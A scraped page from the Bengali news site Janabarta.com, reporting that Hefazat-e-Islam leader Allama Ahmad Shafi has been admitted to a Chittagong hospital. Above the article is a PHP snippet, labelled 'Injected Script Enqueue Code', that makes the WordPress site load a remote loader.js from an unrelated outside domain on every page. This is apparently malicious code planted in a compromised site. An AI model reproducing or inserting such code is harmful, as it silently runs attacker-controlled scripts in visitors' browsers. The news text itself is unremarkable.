// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site আল্লামা আহমদ শফী হাসপাতা‌লে ভর্তি - Janabarta.com

আল্লামা আহমদ শফী হাসপাতা‌লে ভর্তি

জনবার্তা অনলাইনঃ দারুল উলূম হাটহাজারীর মহাপ‌রিচালক, হেফাজ‌তে ইসলাম বাংলা‌দে‌শের আমীর আল্লামা আহমদ শফী‌কে শারী‌রিক দুর্বলতার দরুণ চট্টগ্রা‌মের সিএসসিআর নামে বেসরকারী হাসপাতা‌লে ভর্ত‌ি করা‌নো হ‌য়ে‌ছে জানান হেফাজত ইসলামের প্রচার সম্পাদক মাওলানা আনাস মাদানী।

তিনি আরো জানান, ব‌মি ও বার্ধক্যজনিত সমস্যার কার‌ণে হুজুর শারী‌রিকভা‌বে দুর্বল হ‌য়ে প‌ড়ে‌ছেন। তাই বি‌শেষজ্ঞ ডাক্তার‌দের পরাম‌র্শে ১১ই এপ্রিল (শনিবার) সন্ধ‌্যায় তাঁকে হাসপাত‌া‌লে নেয়া হ‌য়ে‌ছে। আল্লামা শফী হুজুর‌ দ্রুত সুস্থতার জন্য সকলের নিকট দোয়া কারনা করেন।